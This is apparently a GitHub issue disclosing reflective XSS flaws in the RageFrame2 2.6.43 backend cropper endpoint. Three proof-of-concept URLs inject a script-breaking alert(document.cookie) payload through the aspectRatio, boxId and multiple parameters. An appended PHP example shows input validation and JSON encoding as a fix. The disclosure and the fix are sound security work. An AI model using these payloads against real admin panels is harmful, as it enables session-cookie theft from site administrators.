RageFrame2 2.6.43 has several reflective XSS vulnerabilities #114

Open
@Hebing123

Summary

RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.

Details

In the image cropping function of RageFrame2 2.6.43, the `aspectRatio`, `boxId` and `multiple` variables are not filtered, resulting in multiple reflective XSS vulnerabilities.

POC

aspectRatio XSS payload

http://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0

boxId XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0

multiple XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
image
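
One way to close this class of bug, added here as an example (not RageFrame2's code and not part of the original issue): validate each crop parameter against the type it is meant to carry, and JSON-encode anything written into a `<script>` block so a `</script>` sequence cannot end it. The function names, the `boxId` character set and the default ratio are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from RageFrame2): reduce the three query
// parameters named in the report to the narrow types they should carry.
function sanitizeCropParams(array $query): array
{
    // aspectRatio: a positive, finite number such as 1 or 1.7778.
    $ratio = filter_var($query['aspectRatio'] ?? null, FILTER_VALIDATE_FLOAT);
    if ($ratio === false || !is_finite($ratio) || $ratio <= 0) {
        $ratio = 1.0; // assumed default, not taken from the project
    }

    // boxId: assumed to be a widget/DOM id, so only id-safe characters pass.
    $boxId = $query['boxId'] ?? '';
    if (!is_string($boxId) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $boxId) !== 1) {
        throw new InvalidArgumentException('invalid boxId');
    }

    // multiple: a 0/1 flag; anything other than the string "1" is false.
    $multiple = ($query['multiple'] ?? '0') === '1';

    return ['aspectRatio' => $ratio, 'boxId' => $boxId, 'multiple' => $multiple];
}

// Encode a value for use inside an inline <script> block. The JSON_HEX_*
// flags emit <, >, &, ' and " as \uXXXX escapes, so the output can never
// contain a literal "</script>".
function toScriptLiteral($value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed input: the payload string from the PoC URLs above, URL-decoded.
$payload = '</script><script>alert(document.cookie)</script>';

// aspectRatio and multiple fall back to safe values of the expected type.
$safe = sanitizeCropParams(['aspectRatio' => $payload, 'boxId' => '1', 'multiple' => $payload]);
echo toScriptLiteral($safe), "\n";

// boxId is rejected outright rather than repaired.
try {
    sanitizeCropParams(['aspectRatio' => '1', 'boxId' => $payload, 'multiple' => '0']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```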
